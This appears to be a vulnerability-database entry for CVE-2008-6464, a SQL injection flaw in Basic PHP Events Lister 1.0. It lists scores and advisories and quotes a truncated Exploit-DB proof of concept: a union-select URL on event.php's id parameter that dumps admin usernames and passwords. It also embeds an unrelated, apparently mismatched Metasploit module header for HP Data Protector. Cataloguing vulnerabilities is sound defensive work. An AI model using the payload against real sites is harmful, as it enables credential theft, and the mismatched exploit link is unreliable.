CVE-2008-6464
Published 2009-03-13
Priority: P340 | Severity: high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.05% (60.1th percentile)
SQL injection vulnerability in event.php in Mevin Productions Basic PHP Events Lister 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mevin | basic-php-events-lister | — | — |
No detection rules found.
Exploit-DB
HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
exploitdb·2014-03-10
CVE-2013-2347 HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'HP Data Protector Backup Client Service Remote Code Execution',
'Description' => %q{
This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code
execution. The vulnerability exists in the EXEC_BAR operation, which allows to
execute arbitrary processes. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Aniway.Anyway ', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2347' ],
[ 'BID', '6464
Exploit-DB
Basic PHP Events Lister 1.0 - SQL Injection
exploitdb·2008-09-21
CVE-2008-6464 Basic PHP Events Lister 1.0 - SQL Injection
---
[~] Basic PHP Events Lister Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: Basic PHP Events Lister
[~] site: http://www.mevin.com
[~] Download: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip
[~] Vulnerability Class: SQL Injection
[~] Online Demonstration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
[~] Exploit:
http://host/event.php?id=-0x90+union+select+0x
No writeups or analysis indexed.
http://osvdb.org/48499
http://secunia.com/advisories/31779
http://www.securityfocus.com/bid/31278
http://www.vupen.com/english/advisories/2008/2648
https://www.exploit-db.com/exploits/6508